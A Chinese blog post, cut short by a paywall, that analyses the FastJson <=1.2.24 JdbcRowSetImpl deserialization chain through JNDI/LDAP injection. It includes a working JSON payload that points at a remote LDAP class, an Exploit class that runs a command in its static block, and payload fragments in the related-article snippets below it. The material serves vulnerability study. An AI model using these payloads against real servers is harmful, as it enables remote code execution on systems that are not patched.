FastJson<=1.2.24 JdbcRowSetImpl利用链分析

最新推荐文章于 2024-03-03 08:16:32 发布
VIP文章 最新推荐文章于 2024-03-03 08:16:32 发布
阅读量3.3k 收藏 1
点赞数 1
文章标签: 安全 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45682070/article/details/122216141
版权

前言
上文分析了TemplatesImpl利用链,对fastjson parseObject函数进行了分析,明白了整个触发漏洞的流程,接着来学习JdbcRowSetImpl 利用链,JdbcRowSetImpl的利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要Json.parse(input)即可进行命令执行。这条链主要利用了setAutoCommit方法调用InitialContext.lookup并且参数是未经过滤dataSourceName,导致JNDI注入,造成命令执行。其中涉及了JDNI注入 + RMI/LDAP 的知识,再前文也简单分析过JNDI+RMI/JNDI+LDAP的利用,如果不明白可以参考前文JNDI注入(RMI攻击实现和LDAP攻击实现)
JdbcRowSetImpl限制条件
主要限制的因素是jdk版本,个人版本为jdk1.8.0_121

基于RMI利用的JDK版本 ≤ 6u141、7u131、8u121
基于LDAP利用的JDK版本 ≤ 6u211、7u201、8u191。

在这里插入图片描述
攻击流程

首先是这个lookup(URI)参数可控
攻击者控制URI参数为指定为恶意的一个RMI服务
攻击者RMI服务器向目标返回一个Reference对象,Reference对象中指定某个精心构造的Factory类;
目标在进行lookup()操作时,会动态加载并实例化Factory类,接着调用factory.getObjectInstance()获取外部远程对象实例;
攻击者可以在Factory类文件的静态代码块处写入恶意代码,达到RCE的效果;

源码分析
影响版本:fastjson<=1.2.24
payload:

{"@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://127.0.0.1:1389/#Exploit", "autoCommit":true}

Exploit代码,需要编译成class文件放到web服务中去:

import java.io.IOException;

public class Exploit {
    public Exploit() {
    }
    static {
        try {         
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

poc代码:

package org.example.fastjson.JdbcRowSetImpl;
i
最低0.47元/天 解锁文章
XiaoLeiZhaoO
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
fastjson-c3p0:fastjson不出网回显利用
03-19
fastjson-c3p0 fastjson不出网回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce
Fastjson JdbcRowSetImpl利用链学习
虚幻私塾
04-15 1407
Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.csdn.net/m0_56069948/article/details/122285941 JdbcRowSetImpl 接着继续学习fastjson的第二条链JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体set
fastjson不出网利用方案
最新发布
m0_62207482的博客
03-03 731
Tomcat 8.0以后使用org.apache.tomcat.dbcp.dbcp2.BasicDataSource• Tomcat 8.0以下使用 org.apache.tomcat.dbcp.dbcp.BasicDataSource。# 目 前 公 开 已 知 的 poc 有 两 个 : com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl。
autotype安全 fastjson_FastJson checkAutoType安全机制研究
weixin_39531037的博客
12-22 677
FastJson1.2.25以及之后的版本中,fastjson为了防止autoType这一机制带来的安全隐患,增加了一层名为checkAutoType的检测机制。在之后的版本中,随着checkAutoType安全机制被不断绕过,fastjson也进行了一系列例如黑名单防逆向分析、扩展黑名单列表等加固。但是checkAutoType的原理未曾有过大的变化,因此本文将以fastjson 1.2.25...
Fastjson v1.2.80 Throwable AutoType 机制绕过漏洞分析
include_voidmain的博客
05-26 3387
声明 以下内容,来自且听安全公众号的QCyber作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。 0x01 漏洞信息 近期Fastjson Develop Team报告了Fastjson v1.2.80存在AutoType绕过反序列化漏洞,通报如下: 漏洞在特定条件下可以绕过默认关闭的AutoType限制,结合一个新的利用链,可实现RCE 。 0x02 AuthType 机制 Fastjson通过函数`parse`
再探fastjson
qq_31065143的博客
03-11 222
再探fastjson 实验环境 java 8u112 IDEA2020.3 fastjson fastjson 1.2.25-1.4.41 import com.alibaba.fastjson.JSON; public class Main { public static void main(String[] args) { String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName
[Java安全]—fastjson漏洞利用
snowlyzz的博客
12-30 1800
Fastjson组件反序列化分析,从基础到RCE的过程笔记
Java反序列化6-Fastjson JdbcRowSetImpl 链及后续漏洞分析
weixin_43263451的博客
07-18 1159
上一节讲了TemplatesImpl链的利用方式,但是呢其局限性较大需要后端开启Feature.SupportNonPublicField且因为Feature.SupportNonPublicField是在fastjson1.2.22版本才引入所以只影响1.2.22-1.2.24版本fastjson这里的JdbcRowSetImpl链比TemplatesImpl链利用范围更大一点后面版本的fastjson漏洞都是在绕过黑名单,所以在本文中一次全部陈述总结前言.前言.前言。............
FastJson之autotype bypass
洋洋的小黑屋
08-04 751
FastJson之autotype bypass 在1.2.25版本之后,添加了checkAutoType方法。在方法中引入了白名单(AutoType)、黑名单(denyList)和autoTypeSupport选项 checkAutoType方法 把ubuntu靶机的fastjson版本换到1.2.25,使用原始的payload进行debug {"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.2
FastJSON autoType is not support问题解决
lonelymanontheway的博客
06-03 3685
autoType is not support问题出现,排查,本地复现,解决过程记录。
Fastjson 1.2.24远程代码执行漏洞(com.sun.rowset.JdbcRowSetImpl
further_eye的博客
11-16 3838
漏洞是利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大的影响。
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
fastjson1.2.69反序列化远程代码执行漏洞介绍fastjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令...
fastjson-1.2.24.jar
02-24
java运行依赖jar包
fastjson-1.2.24
04-24
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
fastjson1.2.8 反序列化远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御反序列化漏洞,导致当黑客不断发掘新的反序列化Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御...经研究,该漏洞利用门槛较低,可绕过autoType限制,风险影响较大。
android fastjson漏洞_Fastjson 反序列化漏洞史
weixin_32309879的博客
01-12 479
作者:Longofo@知道创宇404实验室时间:2020年4月27日Fastjson没有cve编号,不太好查找时间线,一开始也不知道咋写,不过还是慢慢写出点东西,幸好fastjson开源以及有师傅们的一路辛勤记录。文中将给出与Fastjson漏洞相关的比较关键的更新以及漏洞时间线,会对一些比较经典的漏洞进行测试及修复说明,给出一些探测payload,rce payload。Fastjson解析流程...
fastjson 序列化 不包括转义字符_Fastjson 反序列化漏洞自动化检测
weixin_39542936的博客
10-24 367
fastjson 是 java 中常用的一个用来序列化反序列化 JSON 数据的库。因其优异的性能表现,在 java web 开放中应用比较广泛。最近需要写一个 fastjson 的检测插件,稍微研究了一下后,感觉有一个比较不错的检测方法,在这里和大家分享下。在文章开始之前我想说明一点这里介绍的是检测方法而不是利用方法。这是两个不同的目标实现这两个目标需要考虑的细节也是不同的。在做漏洞检测时尤其是...
Fastjson 的 3 种漏洞利用链,一起来看看
Java技术栈,分享最主流的Java技术
11-05 1491
作者:4ra1n 来源:https://www.anquanke.com/post/id/248892 Fastjson已被大家分析过很多次,本文主要是对三种利用链做分析和对比 JdbcRowSetImpl String payload = "{\n" + " \"a\":{\n" + " \"@type\":\"java.lang.Class\",\n&quot
fastjson <= 1.2.80 反序列化任意代码执行漏洞
09-02
fastjson <= 1.2.80 存在反序列化任意代码执行漏洞。该漏洞利用了黑白名单防御机制的绕过问题,即使autoType关闭,黑客仍然可以绕过黑白名单防御机制,从而导致远程命令执行漏洞。攻击者可以利用该漏洞攻击远程服务器,风险影响较大。建议fastjson用户立即采取安全措施以保障系统安全。特定依赖存在下,漏洞影响范围在 1.2.80 及之前的版本中。为了解决此漏洞,可以采取以下几种措施: 1.升级到最新版本1.2.83,该版本修复了此次发现的漏洞,并涉及autotype行为变更。需要注意的是,在升级过程中可能会出现不兼容的情况,如果遇到问题可以在https://github.com/alibaba/fastjson/issues寻求帮助。 2.在1.2.68及之后的版本中,fastjson引入了safeMode功能。通过配置safeMode,无论是白名单还是黑名单,都不支持autoType,从而可以杜绝反序列化Gadgets类变种攻击(关闭autoType时需要评估对业务的影响)。开启safeMode的方法可以参考https://github.com/alibaba/fastjson/wiki/fastjson_safemode。 3.还可以考虑升级到fastjson v2版本,具体升级方法可以参考https://github.com/alibaba/fastjson2/releases。请注意,在升级过程中可能会有兼容性问题,因此在开启之前,请充分评估对业务的影响。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [fastjson1.2.8 反序列化远程代码执行漏洞](https://download.csdn.net/download/xiazai_ceshi/18466350)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [fastjson <= 1.2.80 反序列化任意代码执行漏洞](https://blog.csdn.net/qq_18209847/article/details/124952791)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值